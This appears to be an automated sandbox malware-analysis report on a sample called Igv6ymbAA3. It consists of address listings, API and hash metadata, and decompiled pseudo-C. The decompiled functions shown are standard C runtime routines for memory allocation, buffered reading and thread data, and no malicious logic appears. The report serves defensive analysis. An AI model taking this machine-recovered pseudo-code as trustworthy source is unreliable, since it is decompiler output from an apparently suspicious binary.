                                                                                                                                                                      0x004058a9
                                                                                                                                                                      0x004058a9
                                                                                                                                                                      0x0040589b
                                                                                                                                                                      0x0040589b
                                                                                                                                                                      0x0040589b
                                                                                                                                                                      0x0040588f
                                                                                                                                                                      0x00405892
                                                                                                                                                                      0x00405892
                                                                                                                                                                      0x004058cc
                                                                                                                                                                      0x004058cf
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004058d1
                                                                                                                                                                      0x004058d9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004058db
                                                                                                                                                                      0x004058db
                                                                                                                                                                      0x004058e0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004058e2
                                                                                                                                                                      0x004058e4
                                                                                                                                                                      0x00405930
                                                                                                                                                                      0x0040593f
                                                                                                                                                                      0x00405942
                                                                                                                                                                      0x00405944
                                                                                                                                                                      0x00405949
                                                                                                                                                                      0x0040594c
                                                                                                                                                                      0x0040594e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405950
                                                                                                                                                                      0x00405950
                                                                                                                                                                      0x00405953
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405953
                                                                                                                                                                      0x004058e6
                                                                                                                                                                      0x004058ea
                                                                                                                                                                      0x004058ec
                                                                                                                                                                      0x004058f1
                                                                                                                                                                      0x004058f2
                                                                                                                                                                      0x004058f4
                                                                                                                                                                      0x004058f6
                                                                                                                                                                      0x004058f8
                                                                                                                                                                      0x004058f9
                                                                                                                                                                      0x00405904
                                                                                                                                                                      0x00405906
                                                                                                                                                                      0x0040590b
                                                                                                                                                                      0x0040590e
                                                                                                                                                                      0x00405911
                                                                                                                                                                      0x00405916
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405955
                                                                                                                                                                      0x00405955
                                                                                                                                                                      0x00405955
                                                                                                                                                                      0x00405961
                                                                                                                                                                      0x00405963
                                                                                                                                                                      0x00405967
                                                                                                                                                                      0x0040596d
                                                                                                                                                                      0x0040596e
                                                                                                                                                                      0x0040597c
                                                                                                                                                                      0x0040597d
                                                                                                                                                                      0x00405970
                                                                                                                                                                      0x00405970
                                                                                                                                                                      0x00405974
                                                                                                                                                                      0x00405975
                                                                                                                                                                      0x00405975
                                                                                                                                                                      0x00405985
                                                                                                                                                                      0x00405988
                                                                                                                                                                      0x0040598a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040598c
                                                                                                                                                                      0x0040598c
                                                                                                                                                                      0x00405990
                                                                                                                                                                      0x004059a5
                                                                                                                                                                      0x004059ad
                                                                                                                                                                      0x004059b6
                                                                                                                                                                      0x004059b6
                                                                                                                                                                      0x004059b9
                                                                                                                                                                      0x004059c5
                                                                                                                                                                      0x00405992
                                                                                                                                                                      0x00405992
                                                                                                                                                                      0x004059a2
                                                                                                                                                                      0x004059a2
                                                                                                                                                                      0x00405990
                                                                                                                                                                      0x0040598a
                                                                                                                                                                      0x00405916
                                                                                                                                                                      0x004058e4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405860
                                                                                                                                                                      0x00405860
                                                                                                                                                                      0x00405862
                                                                                                                                                                      0x00405864
                                                                                                                                                                      0x00405865
                                                                                                                                                                      0x00405868
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040586a
                                                                                                                                                                      0x0040586a
                                                                                                                                                                      0x0040586d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405868
                                                                                                                                                                      0x0040584f
                                                                                                                                                                      0x004057ea
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                                                      • String ID: 1.2.3
                                                                                                                                                                      • API String ID: 680241177-2310465506
                                                                                                                                                                      • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                      • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02415A17 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 02415A45
                                                                                                                                                                        • Part of subcall function 0241BAB4: __FF_MSGBANNER.LIBCMT ref: 0241BAD7
                                                                                                                                                                        • Part of subcall function 0241BAB4: __NMSG_WRITE.LIBCMT ref: 0241BADE
                                                                                                                                                                      • _malloc.LIBCMT ref: 02415AA9
                                                                                                                                                                      • _malloc.LIBCMT ref: 02415B6D
                                                                                                                                                                      • _malloc.LIBCMT ref: 02415B97
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _malloc
                                                                                                                                                                      • String ID: 1.2.3
                                                                                                                                                                      • API String ID: 1579825452-2310465506
                                                                                                                                                                      • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                                                                                                                      • Instruction ID: 0e3770cb146a8758e3d60578a2d5a3a6da4a0d0a795db1bd6746dd60cb89439b
                                                                                                                                                                      • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                                                                                                                      • Instruction Fuzzy Hash: AB61E1B19887808FC7309F2A98806ABFBE1FB85214F944D2FD1DA87740D775A04ACF52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                      			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                                                                                                                                                      0x0040bcc2
                                                                                                                                                                      0x0040bcca
                                                                                                                                                                      0x0040bcce
                                                                                                                                                                      0x0040bcd3
                                                                                                                                                                      0x0040bcd5
                                                                                                                                                                      0x0040bcd8
                                                                                                                                                                      0x0040bcde
                                                                                                                                                                      0x0040bd01
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bce5
                                                                                                                                                                      0x0040bce5
                                                                                                                                                                      0x0040bce7
                                                                                                                                                                      0x0040bd08
                                                                                                                                                                      0x0040bd0b
                                                                                                                                                                      0x0040bd0d
                                                                                                                                                                      0x0040bd1c
                                                                                                                                                                      0x0040bd1c
                                                                                                                                                                      0x0040bd1f
                                                                                                                                                                      0x0040bd24
                                                                                                                                                                      0x0040bd29
                                                                                                                                                                      0x0040bd29
                                                                                                                                                                      0x0040bd2c
                                                                                                                                                                      0x0040bd2e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bd30
                                                                                                                                                                      0x0040bd30
                                                                                                                                                                      0x0040bd35
                                                                                                                                                                      0x0040bd38
                                                                                                                                                                      0x0040bd3b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bd3d
                                                                                                                                                                      0x0040bd40
                                                                                                                                                                      0x0040bd44
                                                                                                                                                                      0x0040bd4b
                                                                                                                                                                      0x0040bd4e
                                                                                                                                                                      0x0040bd50
                                                                                                                                                                      0x0040bd5a
                                                                                                                                                                      0x0040bd52
                                                                                                                                                                      0x0040bd55
                                                                                                                                                                      0x0040bd55
                                                                                                                                                                      0x0040bd61
                                                                                                                                                                      0x0040bd63
                                                                                                                                                                      0x0040be53
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bd69
                                                                                                                                                                      0x0040bd69
                                                                                                                                                                      0x0040bd69
                                                                                                                                                                      0x0040bd70
                                                                                                                                                                      0x0040bdb6
                                                                                                                                                                      0x0040bdb6
                                                                                                                                                                      0x0040bdb9
                                                                                                                                                                      0x0040be24
                                                                                                                                                                      0x0040be2a
                                                                                                                                                                      0x0040be2d
                                                                                                                                                                      0x0040beb8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bebe
                                                                                                                                                                      0x0040be33
                                                                                                                                                                      0x0040be37
                                                                                                                                                                      0x0040be87
                                                                                                                                                                      0x0040be87
                                                                                                                                                                      0x0040be8b
                                                                                                                                                                      0x0040be95
                                                                                                                                                                      0x0040be9a
                                                                                                                                                                      0x0040be9a
                                                                                                                                                                      0x0040bea2
                                                                                                                                                                      0x0040beaa
                                                                                                                                                                      0x0040beab
                                                                                                                                                                      0x0040beac
                                                                                                                                                                      0x0040bead
                                                                                                                                                                      0x0040beae
                                                                                                                                                                      0x0040bcf9
                                                                                                                                                                      0x0040bcf9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bcfe
                                                                                                                                                                      0x0040be39
                                                                                                                                                                      0x0040be3c
                                                                                                                                                                      0x0040be3f
                                                                                                                                                                      0x0040be44
                                                                                                                                                                      0x0040be45
                                                                                                                                                                      0x0040be45
                                                                                                                                                                      0x0040be45
                                                                                                                                                                      0x0040be48
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040be48
                                                                                                                                                                      0x0040bdbb
                                                                                                                                                                      0x0040bdbf
                                                                                                                                                                      0x0040bde0
                                                                                                                                                                      0x0040bde5
                                                                                                                                                                      0x0040bde7
                                                                                                                                                                      0x0040bde9
                                                                                                                                                                      0x0040bde9
                                                                                                                                                                      0x0040bdc1
                                                                                                                                                                      0x0040bdc8
                                                                                                                                                                      0x0040bdca
                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                      0x0040bdda
                                                                                                                                                                      0x0040bdcc
                                                                                                                                                                      0x0040bdce
                                                                                                                                                                      0x0040bdd1
                                                                                                                                                                      0x0040bdd1
                                                                                                                                                                      0x0040bddc
                                                                                                                                                                      0x0040bddc
                                                                                                                                                                      0x0040bdeb
                                                                                                                                                                      0x0040bdee
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bdf4
                                                                                                                                                                      0x0040bdf4
                                                                                                                                                                      0x0040bdf5
                                                                                                                                                                      0x0040bdf9
                                                                                                                                                                      0x0040bdfe
                                                                                                                                                                      0x0040bdff
                                                                                                                                                                      0x0040be00
                                                                                                                                                                      0x0040be05
                                                                                                                                                                      0x0040be08
                                                                                                                                                                      0x0040be0a
                                                                                                                                                                      0x0040bec6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bec6
                                                                                                                                                                      0x0040be10
                                                                                                                                                                      0x0040be13
                                                                                                                                                                      0x0040beb4
                                                                                                                                                                      0x0040beb4
                                                                                                                                                                      0x0040beb4
                                                                                                                                                                      0x0040beb4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040beb4
                                                                                                                                                                      0x0040be19
                                                                                                                                                                      0x0040be1c
                                                                                                                                                                      0x0040be1e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040be1e
                                                                                                                                                                      0x0040bdee
                                                                                                                                                                      0x0040bd72
                                                                                                                                                                      0x0040bd75
                                                                                                                                                                      0x0040bd77
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bd79
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bd7f
                                                                                                                                                                      0x0040bd81
                                                                                                                                                                      0x0040bd83
                                                                                                                                                                      0x0040bd85
                                                                                                                                                                      0x0040bd85
                                                                                                                                                                      0x0040bd87
                                                                                                                                                                      0x0040bd8a
                                                                                                                                                                      0x0040be5b
                                                                                                                                                                      0x0040be5d
                                                                                                                                                                      0x0040be61
                                                                                                                                                                      0x0040be6a
                                                                                                                                                                      0x0040be6f
                                                                                                                                                                      0x0040be6f
                                                                                                                                                                      0x0040be72
                                                                                                                                                                      0x0040be77
                                                                                                                                                                      0x0040be78
                                                                                                                                                                      0x0040be79
                                                                                                                                                                      0x0040be7a
                                                                                                                                                                      0x0040be7b
                                                                                                                                                                      0x0040be81
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bd90
                                                                                                                                                                      0x0040bd99
                                                                                                                                                                      0x0040bd9e
                                                                                                                                                                      0x0040bda1
                                                                                                                                                                      0x0040bda3
                                                                                                                                                                      0x0040bda6
                                                                                                                                                                      0x0040bda8
                                                                                                                                                                      0x0040bdab
                                                                                                                                                                      0x0040bdae
                                                                                                                                                                      0x0040bdae
                                                                                                                                                                      0x0040be4b
                                                                                                                                                                      0x0040be4b
                                                                                                                                                                      0x0040be4b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bd69
                                                                                                                                                                      0x0040bd63
                                                                                                                                                                      0x0040bd2e
                                                                                                                                                                      0x0040bd0f
                                                                                                                                                                      0x0040bd14
                                                                                                                                                                      0x0040bd14
                                                                                                                                                                      0x0040bd17
                                                                                                                                                                      0x0040bd1a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bd1a
                                                                                                                                                                      0x0040bce9
                                                                                                                                                                      0x0040bce9
                                                                                                                                                                      0x0040bcee
                                                                                                                                                                      0x0040bcef
                                                                                                                                                                      0x0040bcf0
                                                                                                                                                                      0x0040bcf1
                                                                                                                                                                      0x0040bcf2
                                                                                                                                                                      0x0040bcf8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bcf8

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0241BF29 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                      • Instruction ID: 4b3e1a4b53295860313dcf0b7eb8d8da912277ccb591ee51026e08a79b1348d6
                                                                                                                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A510971A40308EFCB218FBACC8459FBBB5EF54368F14821BF82596290D7719A91CF52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0241C9A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fileno$__getptd_noexit__lock_file
                                                                                                                                                                      • String ID: 'B
                                                                                                                                                                      • API String ID: 3755561058-2787509829
                                                                                                                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                      • Instruction ID: f0786d858fef7c31e6da2048300b8042ca0a08f385ab32d4ae4b7d677493e5f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D016B336D071056C2116B799CC162E73A19E86B31366430FE4709B5D4EB28C543DD96
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                                      			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}







                                                                                                                                                                      0x00414738
                                                                                                                                                                      0x00414738
                                                                                                                                                                      0x00414738
                                                                                                                                                                      0x00414738
                                                                                                                                                                      0x00414738
                                                                                                                                                                      0x0041473a
                                                                                                                                                                      0x0041473f
                                                                                                                                                                      0x00414749
                                                                                                                                                                      0x0041474b
                                                                                                                                                                      0x00414753
                                                                                                                                                                      0x00414777
                                                                                                                                                                      0x00414779
                                                                                                                                                                      0x0041477f
                                                                                                                                                                      0x00414783
                                                                                                                                                                      0x00414786
                                                                                                                                                                      0x00414791
                                                                                                                                                                      0x00414794
                                                                                                                                                                      0x0041479b
                                                                                                                                                                      0x00414755
                                                                                                                                                                      0x00414755
                                                                                                                                                                      0x00414759
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041475b
                                                                                                                                                                      0x00414760
                                                                                                                                                                      0x00414760
                                                                                                                                                                      0x00414759
                                                                                                                                                                      0x00414765
                                                                                                                                                                      0x00414769
                                                                                                                                                                      0x0041476e
                                                                                                                                                                      0x00414776

                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                      • __lock.LIBCMT ref: 00414779
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                      • String ID: @.B
                                                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
